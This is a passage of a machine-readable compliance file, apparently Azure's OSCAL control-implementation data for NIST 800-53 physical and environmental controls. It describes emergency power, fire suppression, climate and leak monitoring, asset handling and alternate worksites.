buttons can be placed in the colocations, manned Facilities Operation Centers (FOCs), or as required by local fire code. In most Azure datacenters, the datacenter design no longer requires EPO buttons."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"ebf49086-8fff-40f1-b09e-ac68d38cd944","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-033"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-10_smt.c","by-components":[{"uuid":"141b57c2-5346-43a8-85e7-a2ff2ecc3283","export":{"provided":[{"uuid":"981224c2-117a-45c8-ad7d-54ce63851bda","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-033"}],"description":"When present, to prevent accidental activation, EPO buttons may have a protective enclosure, require dual activation, or utilize an audible alarm as a warning before activation. Additionally, EPO buttons are under video surveillance."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"b1d3a4fb-b93f-4685-be6e-5754bb3daaf0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-11","statements":[{"uuid":"7605d3b6-a2b1-4179-9b27-10fb907d9d17","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-034"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-11_smt","by-components":[{"uuid":"211e99ca-0cd1-46e5-9a8a-acc4c059158b","export":{"provided":[{"uuid":"22c078c5-90f8-48d3-9237-d832863f4016","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-034"}],"description":"Azure has implemented emergency power by protecting datacenter equipment and circuits with an Uninterruptable Power Supply (UPS) system which provides a short-term power supply to provide power until generators are able to come online. Azure utilizes various forms of UPS systems and generators throughout its datacenters._x000D_ _x000D_ Azure has implemented the control for emergency power by protecting datacenter equipment and circuits with an uninterruptible power supply (UPS) system which provides a short-term power supply until generators are able to come online and transition the load. Azure utilizes various forms of UPS systems and generators throughout its datacenters. Azure datacenters are designed with at least an n+1 configuration for electrical and cooling systems. Azure datacenters maintain sufficient onsite fuel storage to operate for approximately 48 hours. Alternate refueling agreements are required in order to ensure a fuel supply is available in the event of a long term utility power loss._x000D_ _x000D_ Azure Third-Party (Leased) Datacenters_x000D_ _x000D_ Azure requires that its leased datacenter providers be capable of providing sufficient UPS power to allow for the transition of the system's full load to generator power. Azure also requires that onsite power generation be capable of sustaining the system's full load for 48 hours with on-site fuel stores. Azure requires that its leased datacenter providers also have alternate fuel agreements in place to allow for refueling._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"cd499ca0-6859-4d05-889e-6b4238297707","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-11.1","statements":[{"uuid":"8083b72b-cfee-43cd-8701-21dd8a47065d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-035"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-11.1_smt","by-components":[{"uuid":"095ba3f2-83f1-4544-ba46-a6cf4694b4ce","export":{"provided":[{"uuid":"7605ddc1-315e-458d-82ca-5990a7e46a1f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-035"}],"description":"In the event of an extended loss of the primary power source, Azure implements a long-term alternate power supply for the information system that can maintain minimally required operational capability. When power fails or drops to an unacceptable voltage level, Uninterruptable Power Supply (UPS) systems instantly kick in and take over the power load. This provides enough power for running the servers until the generators can take over. Emergency generators provide back-up power for extended outages and for planned maintenance and can operate the datacenter with on-site fuel reserves in the event of a natural disaster. Azure maintains diesel generator at many of its datacenters. Backup generators are used when necessary to help maintain grid stability or in extraordinary repair, and maintenance situations that require us to take our datacenters off the power grid._x000D_ _x000D_ Azure datacenters are designed with at least an n+1 configuration for electrical and cooling systems. Azure datacenters maintain sufficient onsite fuel storage to operate for approximately 48 hours. Alternate refueling agreements are required in order to ensure a fuel supply is available in the event of a long term utility power loss._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"f66e38a3-0fbc-4155-9c6a-f6fcc15ad87b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-12","statements":[{"uuid":"a045856e-8996-45b5-adcc-e1cb88e7177c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-036"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-12_smt","by-components":[{"uuid":"f11b3be5-35b2-4697-b632-58088044161e","export":{"provided":[{"uuid":"c0e10935-99d1-4117-bebb-3e3331a41dfe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-036"}],"description":"Azure datacenters implement emergency lighting in the form of overhead emergency lighting on dedicated circuits backed up by UPS and generator systems. Automatic emergency lighting is implemented along all evacuation routes, emergency exits, and inside the colocations in accordance with the National Fire and Protection Association (NFPA) Life Safety Code. If utility power is lost, the emergency lighting automatically switches to power provided by the UPS and generator systems. The emergency lighting systems within Azure datacenters undergo routine maintenance to ensure that they remain in proper working order._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"39c0d2bc-ac30-4ccb-b0d8-542c3727b6b1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-13","statements":[{"uuid":"e585141b-95c6-4dcf-b67d-afcc374354a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-037"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-13_smt","by-components":[{"uuid":"227b2bde-385a-4b54-98fc-8aa75a8dc6e8","export":{"provided":[{"uuid":"e7ce5183-8e68-478b-961e-95372650c502","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-037"}],"description":"Azure has implemented fire protection by installing fire detection and fire suppression systems at the Azure datacenters. Azure datacenters implement robust fire detection mechanisms. The Azure fire protection approach includes the use of photoelectric smoke detectors installed below the floor and on the ceiling, which are integrated with the fire protection sprinkler system. Additionally, there are Very Early Smoke Detection Apparatus (VESDA) systems in each colocation which monitor the air. VESDA units are highly sensitive air sampling systems installed throughout multiple high-value spaces. VESDA units allow for an investigative response prior to an actual fire detection alarm._x000D_ _x000D_ Pull station fire alarm boxes are installed throughout the datacenters for manual fire alarm notification. Fire extinguishers are located throughout the datacenters and are properly inspected, serviced, and tagged annually. The security staff patrols all building areas multiple times every eight (8) hour shift. The Critical Environments (CE) Team does a daily site walk-through checking on each room and many component parts in each non-monitored room ensuring all fire watch requirements are being met._x000D_ _x000D_ Areas containing sensitive electrical equipment (colocations, Main Distribution Frames (MDFs), etc.) are protected by double interlock pre-action (dry pipe) sprinkler systems. Dry pipe sprinklers are a two-stage pre-action system that requires both a sprinkler head activation (due to heat) as well as smoke detection to release water. The sprinkler head activation releases the air pressure in the pipes which allows the pipes to fill with water. Water is released when a smoke or heat detector is also activated._x000D_ _x000D_ Fire detection/suppression and emergency lighting systems are wired into the datacenter UPS and generator systems providing for a redundant power source._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"3dc6e061-594b-4214-bb4e-b6e7367df018","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-13.1","statements":[{"uuid":"cbc73ef6-7100-42e8-aff9-fbf2b51230d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-038"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-13.1_smt","by-components":[{"uuid":"ec241d67-8eb0-49c3-82b0-93ae1eff447c","export":{"provided":[{"uuid":"673b9e29-6bd2-4dc5-98f6-9cf2ec9f78c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-038"}],"description":"Azure employs fire detection devices/systems for the information system that activate automatically and notify datacenter personnel along with emergency responders in the event of a fire._x000D_ _x000D_ Fire detection includes photoelectric smoke detectors installed below the floor and on the ceiling and smoke detection systems such as the Xtralis Very Early Smoke Detection Apparatus (VESDA) systems, as well as pull station fire alarms for manual fire alarm notification._x000D_ _x000D_ If one of the fire detection mechanisms is activated in any colocation, the local fire department is automatically notified through a contracted third-party monitoring vendor. In addition, the fire protection and fire detection systems are tied into the security system notifying the local facility and security staff ._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"8d2343c9-2bee-4684-b641-7edf3f8b7efb","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-13.2","statements":[{"uuid":"826076c4-cbd5-4fd4-bb38-3fecf3afe009","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-039"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-13.2_smt.a","by-components":[{"uuid":"714b6de1-bd97-45b1-aa78-9f4aabe5ccf3","export":{"provided":[{"uuid":"8701054e-16ae-4da7-a15e-32d5d73e4f9b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-039"}],"description":"If one of the fire suppression systems is activated at the datacenter, the local fire department is automatically notified through the fire alarm system . In addition, the fire protection and fire detection systems are tied into the security system notifying the local facility and security staff. Azure datacenters are staffed twenty-four (24) hours a day, seven (7) days a week. Fire suppression systems engage automatically without manual intervention when a fire alarm situation is detected."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"08a53c93-c376-44e5-b27e-cd1362007bdc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-040"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-13.2_smt.b","by-components":[{"uuid":"e341b4b7-3ee3-42d4-bedb-6b9536d55bda","export":{"provided":[{"uuid":"b609a6ad-41b2-4924-9345-3d87c26c4a2c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-040"}],"description":"If one of the fire suppression systems is activated at the datacenter, the local fire department is automatically notified through the fire alarm system . In addition, the fire protection and fire detection systems are tied into the security system notifying the local facility and security staff. Azure datacenters are staffed twenty-four (24) hours a day, seven (7) days a week. Fire suppression systems engage automatically without manual intervention when a fire alarm situation is detected. Automatic fire suppression capability is deployed in addition staffing."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"6f647c79-0b6e-48b0-aaac-17676cee6c71","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-14","statements":[{"uuid":"d995aff4-37ff-4f74-97a0-341d7cdb6c49","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-041"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-14_smt.a","by-components":[{"uuid":"2a5872b5-da49-4e39-8a6d-1f96c1732d79","export":{"provided":[{"uuid":"5dc3d9bd-9347-461f-b683-b63ebde5a5e4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-041"}],"description":"Azure maintains the temperature and humidity levels in accordance with Microsoft datacenter guidelines. The temperature and humidity levels are monitored continuously by the datacenter's Building Management System (BMS)."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"302752b3-a478-459f-8f15-f94c69d5685a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-042"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-14_smt.b","by-components":[{"uuid":"005937b5-18c6-4b1b-9a3d-336dc314a992","export":{"provided":[{"uuid":"2252720d-3ed8-482b-bffc-1472a14c0caf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-042"}],"description":"At Azure datacenters, temperature and humidity levels are monitored continuously by the Building Management System (BMS). CE team members monitor the BMS from the Facilities Operations Center (FOC), so that they can manage the temperature and humidity within the datacenter before any alarm points are exceeded. BMS is configured with several notification points. As the temperature or humidity approaches these points, notifications are sent so that the CE team can be dispatched for investigation or able to make adjustments to remediate the temperature or humidity within the datacenter. The acceptable datacenter temperature range within cold aisles is between 65 degrees and 95 degrees Fahrenheit. In certain instances, the temperature may require adjustment outside of this range to address local geographical and meteorological factors. Datacenter humidity is measured by Relative Humidity percentage, Non-Condensing with the current acceptable range between 10% and 80%."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"a026398f-f7d2-4dfa-949f-b63a41238fe7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-14.2","statements":[{"uuid":"c77650a2-bfd4-43e6-9bd0-5fb83a073908","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-043"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-14.2_smt","by-components":[{"uuid":"60b817bc-611e-4e2d-a40b-3aab104ef840","export":{"provided":[{"uuid":"e4e00086-933c-43c1-b30b-3ff60aec8cc4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-043"}],"description":"At Azure datacenters, temperature and humidity levels are monitored continuously by the Building Management System (BMS). CE team members monitor the BMS from the Facilities Operations Center (FOC), so that they can manage the temperature and humidity within the datacenter before any alarm points are exceeded. BMS is configured with several notification points. As the temperature or humidity approaches these points, notifications are sent so that the CE team can be dispatched for investigation or able to adjust the temperature or humidity within the datacenter._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"569d62fe-fb6f-43b2-a7ec-e99247d6d401","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-15","statements":[{"uuid":"8100ce22-e986-4f4d-b849-a668fc9ca236","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-044"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-15_smt","by-components":[{"uuid":"7a221166-d0fb-45d5-8088-355e8756b43c","export":{"provided":[{"uuid":"f9089324-25b1-40f9-9a05-1fcc86dcdcc1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-044"}],"description":"Azure provides water and leak detection in areas with a risk of water leakage, such as near Air Handlers Units. Fire suppression systems also have leak detection alarms that are monitored. The water/leak detection system is integrated with the facility alarm and notification system. The sprinkler systems in the datacenters are zoned. The Critical Environment (CE) team and Datacenter Management (DCM) teams are familiar with emergency procedures requiring the use of the water shutoff valves and their locations. The sprinkler risers can be shut off individually or as a group via gate valves. All sprinklers in the critical space are double interlock pre-action type sprinklers that require two forms of activation before flow is initiated. The pressure of the sprinkler system is monitored and alarmed against water leakage._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"9ad4f21b-3b40-4d98-ad21-a778382f7f09","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-15.1","statements":[{"uuid":"dc7e1acd-3072-4ea1-a85f-5023ea038a5c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-045"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-15.1_smt","by-components":[{"uuid":"2f061a5c-81e2-4084-87d5-9f988db967eb","export":{"provided":[{"uuid":"048d48b3-9031-436c-a94f-ffd301b6ece8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-045"}],"description":"Azure employs automated mechanism to detect water presence in the datacenters and alerts datacenter personnel. Azure provides water/leak detection in areas with a risk of water leakage (e.g. Air Handlers Units). Fire suppression systems also have leak detection alarms that are monitored. The water/leak detection system is integrated with the facility alarm and notification system. The pressure of the sprinkler system is monitored and alarmed against water leakage._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"b1f92102-0f98-4e3a-848c-53f6e637a8b8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-16","statements":[{"uuid":"dd17842f-fd44-4d61-a353-e36e105e68a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-046"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-16_smt","by-components":[{"uuid":"8407b815-9200-4150-ae9b-cdf255d3687a","export":{"provided":[{"uuid":"1ec93024-ced9-439b-8926-f44a3bfe4dfb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-046"}],"description":"Assets that are to be destroyed are stored in locked storage bins that are under CCTV camera coverage. When the assets are ready to be destroyed, the locked storage bins are moved to shredding locations by Microsoft full time employee (FTE) from Asset Management. As shredding occurs at the datacenter and under Microsoft supervision, Azure assets do not leave the controlled areas of the datacenter. Azure implements strict enforcement of what is allowed to enter and exit the datacenter. All system components/assets are tracked in the asset management tool database. Information system component deliveries must be scheduled; unscheduled deliveries are refused entry past the datacenter gates. Deliveries are received in the facilities loading bay. The facilities asset manager must be present during the delivery. The loading bay is monitored with a live CCTV feed in the datacenter security operations center. In datacenters where the loading bay is adjacent to the staging area, the loading bay doors are designed in an interlock configuration, so that if the loading bay door is open for a delivery truck, the interior door to the staging area is not capable of being opened. When an information system component enters the building, the asset management team verifies the received item against the referenced ticket and then scans the device into Azure-managed asset management tool. New assets are unpacked in the staging area and stored in the asset management room until deployment. Depending on asset value, some high value assets are stored in separate locked cages with cameras. The general storage area within the asset management room requires an access smart card for entry and has multiple cameras for video monitoring. For an information system component that is leaving the datacenter, a ticket request must be generated on the system owner's behalf via the asset deployment tool. All data is removed from the system (i.e. hard drives wiped or purged depending on asset classification) before leaving the datacenter. All information system components received or shipped are tracked by the workflow ticketing tool and/or in the receiving/shipping logs in the asset management tool. Visitors are prohibited from using personal laptops or cell phones with camera capabilities in the production environment (colocations) per the datacenter policy and work rules. If the equipment entering the datacenter is used for maintenance purposes, the equipment requires datacenter management approval in the DCAT system. Azure Third Party (Leased) Datacenters In leased datacenters, the loading bay area is controlled by the datacenter provider. To manage entry and exit of Azure system components, an Azure representative must be present during the process."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"c258c72f-dc15-4a16-b734-5bf499436f97","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-17","statements":[{"uuid":"62211750-a5b6-4d81-bc52-5e36ca39bd1e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-047"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-17_smt.a","by-components":[{"uuid":"e2c3b492-afd0-4ada-ae1b-20d6204588b1","export":{"provided":[{"uuid":"0ebc686a-a582-4f7a-bbb5-f4acf0837128","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-047"}],"description":"Azure identifies designated Microsoft campuses and telecommuting locations as the alternate worksites. Azure has implemented appropriate management, operational and technical controls at these facilities i.e. all Azure datacenters in the US have the same controls implemented as documented in this SSP. These controls are assessed to assure the effectiveness of the security measures. Access control such as access to the alternate work sites are monitored regularly and visitors are required to check in with receptionist. Telecommuting locations are governed by the Microsoft remote access policy which requires remote access to production Microsoft's online services' networks to employ authentication mechanisms. Microsoft owns multiple buildings from which Microsoft personnel can work from in the case of an emergency in a building or set of buildings. Microsoft buildings are built and operated to the same security standards."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"ee4f2003-1160-4abe-837a-b143954a0e48","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-048"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-17_smt.b","by-components":[{"uuid":"7bb7db8b-1fbf-4c6e-9af3-80f1112bb70d","export":{"provided":[{"uuid":"a5662251-79fb-40bf-96f1-effed1f3a9a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-048"}],"description":"Azure testing procedures based on NIST Special Publication 800-53A Revision 5 are assessed at each datacenter, regardless if they are designated as primary or alternate sites for applications supported in the environment. Azure implements the same controls at each of these work sites, as each site supports various Microsoft properties. Depending on capacity, each datacenter can be used as an alternate to another and is built to identical physical, environmental, and security standards. The security controls at each datacenter are identical and in accordance with the procedures outlined in the Physical Security Operations Standard Operating Procedure (SOP). All datacenter work is performed by Microsoft personnel who are cleared, trained, and authorized to work within the datacenter environment."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"71ca3a93-ba4d-4cab-bedc-30505d1ca022","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-049"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-17_smt.c","by-components":[{"uuid":"61f4ed95-544b-4c0c-b182-99f9c33d2792","export":{"provided":[{"uuid":"df53773f-b8bf-4683-a3b3-59eab6436b23","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-049"}],"description":"In the event of a security incident, datacenter personnel can communicate to each other using handheld radios and cell phones. During an incident one practice is to create a conference bridge to allow for communication with alternate worksites and the Security Response Team. In addition, Azure personnel are trained on incident management capabilities. This training is conducted at least annually."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"f33803b3-8046-4bb4-b451-ef834dd95cdc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-18","statements":[{"uuid":"e6519dde-564e-46b8-a231-eee41a814252","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-050"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-18_smt","by-components":[{"uuid":"42b208cb-b5a5-45a3-9762-ba248253e01e","export":{"provided":[{"uuid":"b07daa0d-5b02-4ea2-9f6f-900c640d211b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-050"}],"description":"Azure implements strategic datacenter design approach to satisfy the location of information system components control. All Microsoft's online services' equipment is placed in locations which have been engineered to be protected from environmental risks such as theft, fire, explosives, smoke, water, dust, vibration, earthquake, harmful chemicals, electrical interference, power outages, electrical disturbances (spikes), and radiation. The facility and infrastructure have implemented seismic bracing for protection against environmental hazards. All colocation and Main Distribution Frame (MDF) rooms are protected by access control, alarms, and video. The facility is also patrolled by security officers twenty-four (24) hours a day, seven (7) days a week. All portable Azure assets are locked or fastened in place to provide protection against theft or movement damage._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"2f708e9e-37fc-4476-b033-443c927c596c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-2","statements":[{"uuid":"b271b30c-2b0e-4ac8-b1a2-620964e80abb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-2_smt.a","by-components":[{"uuid":"ca64a09e-dbf5-4e63-a955-2e4a26865e29","export":{"provided":[{"uuid":"8b1624a5-4db4-4c54-acfc-84c752dfaec0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-006"}],"description":"The Azure System Security Plan provides an overview of the security requirements for Azure and the services within. Additionally, it contains a description of the security controls that are in place to meet those requirements. The Azure System Security Plan is created in accordance with NIST Special Publication 800-18 Revision 1, Guide for Developing Security Plans for Federal Information Systems based on the required template, which contains guidance on security planning. This includes accurately defining the Azure accreditation boundary, as well as describing the operational environment, the security controls that are applicable to the system, and the system interconnections. The Azure System Security Plan documents the security categorization of the system based on the typical information being stored, processed or transmitted in Azure. The sponsor's Authorizing Official (AO) approves the System Security Plan as part of the package submission and granting of the Authority to Operate (ATO). This SSP: * Explicitly defines the boundary of the system in sections 9 and 10 of this document. * Provides an overview of the security and operational requirements for the system and a description of the security controls in place or planned for meeting those requirements in the Minimum Security Controls in section 13 of this document. * Provides the overview of the infrastructure for storage that provides customers the capability to purchase, use, and/or deploy these offerings within Azure in sections 9 and 10. Customers configure their implementation of Storage using the Azure portal. * Provides a security categorization of the system in section 2 based on the information being stored, processed, and transmitted. The system security categorization determination is based on the actual data stored, processed or transmitted by customers utilizing Azure services. * Is aligned with the guidance contained in NIST Special Publication 800-18 Revision 1, which contains guidance on security planning. This includes accurately defining Azure, as well as describing the operational environment and all security controls that are applicable to the system. * Describes relationships with or connections to other information systems. * Is reviewed and approved by the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators prior to plan implementation. The Microsoft Security Policy (MSP) and associated standards establishes coordination requirements among organizations in order to determine if security and privacy related activities are going to affect Azure. Azure personnel plan and coordinate security and privacy 